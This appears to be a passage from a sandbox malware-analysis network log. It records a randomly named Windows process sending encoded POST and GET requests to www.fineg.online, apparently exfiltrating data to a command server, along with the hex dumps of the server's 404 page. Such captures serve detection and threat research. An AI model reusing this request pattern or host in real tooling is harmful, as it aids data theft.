                        Sep 3, 2024 10:44:31.069921017 CEST | 1236 | IN | Data Raw: 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 36 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33
                        Data Ascii: 2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-460.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-450.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-440.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-430.2 2
                        Sep 3, 2024 10:44:31.069927931 CEST | 672 | IN | Data Raw: 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 36 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 35
                        Data Ascii: th class="st2" d="M-260.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-250.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-240.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-230.2 282.4h-3l-6.8 25.2h3z"/> <path
                        Sep 3, 2024 10:44:31.069941998 CEST | 1236 | IN | Data Raw: 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 34 30 2e 32 20 32 38 32 2e 34 68 2d 33
                        Data Ascii: 2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                        Sep 3, 2024 10:44:31.069956064 CEST | 1236 | IN | Data Raw: 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                        Data Ascii: d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M410 282.4h-
                        Sep 3, 2024 10:44:31.074789047 CEST | 1236 | IN | Data Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 32 30
                        Data Ascii: <path class="st2" d="M230 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M220 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M210 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M200 282.4h-3l-6.8 25.2h3z"/> <path class="st


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        11 | 192.168.2.4 | 64989 | 162.0.239.141 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:44:33.168747902 CEST | 10814 | OUT | POST /mkan/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.fineg.online
                        Origin: http://www.fineg.online
                        Referer: http://www.fineg.online/mkan/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 7a 38 70 7a 69 31 77 49 43 6b 4a 55 6f 57 34 4f 6d 69 4a 35 32 44 31 37 41 7a 4f 57 64 71 4d 6b 50 76 64 44 73 34 73 78 64 61 71 77 76 31 53 6f 4a 65 72 39 79 48 43 57 58 76 41 4d 32 75 64 6f 45 6a 77 42 64 34 73 69 65 59 6d 44 34 50 53 32 33 31 64 35 6f 67 42 7a 75 61 73 6c 39 6b 4d 79 59 72 49 64 47 36 75 74 6b 70 58 61 76 56 55 6a 47 58 76 72 2b 6d 33 72 59 6f 7a 54 35 34 65 6a 65 6b 2f 68 4d 70 55 4c 6a 34 4b 2f 54 6c 51 49 51 6f 52 6e 55 4a 6c 79 79 54 48 78 63 49 30 6b 4a 35 62 41 35 5a 7a 42 50 66 65 35 72 6e 6f 73 4d 58 6d 76 66 57 44 45 55 2b 6b 69 74 71 58 4c 62 68 4c 72 59 72 4f 63 76 43 36 39 48 4b 44 4f 74 39 6e 32 61 65 69 74 55 67 64 45 43 6e 73 37 38 36 35 7a 36 59 57 78 74 78 35 35 48 76 74 79 44 77 34 4d 59 35 5a 35 54 6f 37 4c 2b 50 6b 45 4f 56 2b 6d 61 6f 57 78 37 54 32 4e 4d 74 75 4a 49 6f 69 42 42 66 70 6d 68 31 77 6b 70 6e 33 43 38 38 37 45 74 45 71 30 6c 70 67 74 36 44 52 37 68 72 35 47 72 4f 39 6d 4a 39 43 53 68 53 45 67 54 7a 66 6b 2f 67 42 45 6a 47 43 79 63 72 63 [TRUNCATED]
                        Data Ascii: Qd=z8pzi1wICkJUoW4OmiJ52D17AzOWdqMkPvdDs4sxdaqwv1SoJer9yHCWXvAM2udoEjwBd4sieYmD4PS231d5ogBzuasl9kMyYrIdG6utkpXavVUjGXvr+m3rYozT54ejek/hMpULj4K/TlQIQoRnUJlyyTHxcI0kJ5bA5ZzBPfe5rnosMXmvfWDEU+kitqXLbhLrYrOcvC69HKDOt9n2aeitUgdECns7865z6YWxtx55HvtyDw4MY5Z5To7L+PkEOV+maoWx7T2NMtuJIoiBBfpmh1wkpn3C887EtEq0lpgt6DR7hr5GrO9mJ9CShSEgTzfk/gBEjGCycrcRaWbcQHUP/bmG+M/zo/cTjzEi87ynbpo/+fY/bM+zFVWaVQ8nOuoBPEE3EbLPgzL+WK5O03S00sP8kdHGt/iyZGx9E/Qfl9cM/Ms4BamAWQURDcWqLWEvb2dHESxVM8n41X/CJlT3d7q8pU7gGna6oFHyGzG4yYeoStuwDRLG7lp2ARZRUngzsU8ecACgJJzkUlJZJVIIdzLMKY0hN5fS+3RwBNRRe4ho5nML6sk1r9Qd36kM/hdcAdYbZJs6Gby++3VyOhVSRY2SlunG+38auC9RrUs6Y0T7EdKa8APrQqG31lAvk8JDyxYEmDajrHBGpsbJSh/5Mx/OI5Nu2PvSukaB04xoEbtAEDcbD+zzMYVocvdA3v7B5LIadsKCKQajCBT8EK65B5U4qteffjhhjG+fmpxiXleTKeVIPKjGiOKV1UHyAu2yIDXDoUecLfklpJoWVvwVAQWjwRLB++Zf60MfvC9n3oSShak+tyYsAuhVM+hAJ8ZauFeSKtPCvbLwJKlZ4KpNPAGfhTddPImpJUEOl2tafzfxl+YWiAcrbZz4ZsCoefLqCyA9IJGmX8gJji5enkUB0tOJrI5AN7aU4dvkSyP+p8wCzUGbBdifMn1BJTdJmSWLq5BgNa5jfbMkoyjGuqcCd1mZ8eJugRk6XYA/T45r9D1dd [TRUNCATED]
                        Sep 3, 2024 10:44:33.730403900 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:44:33 GMT
                        Server: Apache
                        Content-Length: 18121
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                        Sep 3, 2024 10:44:33.730429888 CEST | 1236 | IN | Data Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                        Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                        Sep 3, 2024 10:44:33.730441093 CEST | 448 | IN | Data Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                        Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                        Sep 3, 2024 10:44:33.730454922 CEST | 1236 | IN | Data Raw: 22 73 74 32 22 20 64 3d 22 4d 32 37 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 38 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c
                        Data Ascii: "st2" d="M279.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M289.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M299.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M309.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M319.8
                        Sep 3, 2024 10:44:33.730474949 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64
                        Data Ascii: > <path class="st2" d="M499.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M1000 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M990 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M980 282.4h-3l-6.8 25.2h3z"/> <path class="s
                        Sep 3, 2024 10:44:33.730488062 CEST | 1236 | IN | Data Raw: 20 64 3d 22 4d 37 39 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 38 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32
                        Data Ascii: d="M790 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M780 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M770 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M760 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M750 282.4h-3l-6.8
                        Sep 3, 2024 10:44:33.730509043 CEST | 1236 | IN | Data Raw: 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 35 36 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 3c 70 61 74 68
                        Data Ascii: 2h3z"/> <path class="st2" d="M560 282.4h-3l-6.8 25.2h3z"/> <g> <path class="st2" d="M-490.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-480.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-470.2 282.4h-3l-6.8 25.
                        Sep 3, 2024 10:44:33.730520964 CEST | 328 | IN | Data Raw: 3d 22 4d 2d 33 30 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e
                        Data Ascii: ="M-300.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-290.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-280.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-270.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M
                        Sep 3, 2024 10:44:33.731102943 CEST | 1236 | IN | Data Raw: 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 34 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61
                        Data Ascii: h3z"/> <path class="st2" d="M-240.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-230.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h-3l-6.8 25.2h3z
                        Sep 3, 2024 10:44:33.731113911 CEST | 224 | IN | Data Raw: 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f
                        Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-30.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-20.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-10.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2
                        Sep 3, 2024 10:44:33.735368013 CEST | 1236 | IN | Data Raw: 22 20 64 3d 22 4d 2d 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 35 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32
                        Data Ascii: " d="M-.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M500 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M490 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M480 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M470 282.4


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        12 | 192.168.2.4 | 64990 | 162.0.239.141 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:44:35.717251062 CEST | 442 | OUT | GET /mkan/?Qd=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.fineg.online
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:44:36.274971962 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:44:36 GMT
                        Server: Apache
                        Content-Length: 18121
                        Connection: close
                        Content-Type: text/html; charset=utf-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                        Sep 3, 2024 10:44:36.274993896 CEST | 1236 | IN | Data Raw: 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20
                        Data Ascii: .2s54.7-28 117.5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d=
                        Sep 3, 2024 10:44:36.275007963 CEST | 1236 | IN | Data Raw: 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38
                        Data Ascii: class="st2" d="M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d=
                        Sep 3, 2024 10:44:36.275019884 CEST | 1236 | IN | Data Raw: 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d
                        Data Ascii: .2h3z"/> <path class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <p
                        Sep 3, 2024 10:44:36.275032997 CEST | 896 | IN | Data Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22
                        Data Ascii: > <path class="st2" d="M870 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M860 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M850 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M840 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                        Sep 3, 2024 10:44:36.275152922 CEST | 1236 | IN | Data Raw: 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 31 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36
                        Data Ascii: s="st2" d="M710 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M700 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M690 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M680 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M670 282.4h-
                        Sep 3, 2024 10:44:36.275166035 CEST | 224 | IN | Data Raw: 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20
                        Data Ascii: <path class="st2" d="M-430.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-420.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-410.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-400.2 282.4h-3l-6
                        Sep 3, 2024 10:44:36.275238991 CEST | 1236 | IN | Data Raw: 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70
                        Data Ascii: .8 25.2h3z"/> <path class="st2" d="M-390.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-380.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-370.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-360.2 282.4h-3l-6.8
                        Sep 3, 2024 10:44:36.275295973 CEST | 224 | IN | Data Raw: 22 20 64 3d 22 4d 2d 31 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 38 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c
                        Data Ascii: " d="M-190.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-180.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-170.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-160.2 282.4h-3l-6.8 25.2h3z"/>
                        Sep 3, 2024 10:44:36.275305986 CEST | 1236 | IN | Data Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d
                        Data Ascii: <path class="st2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <pa
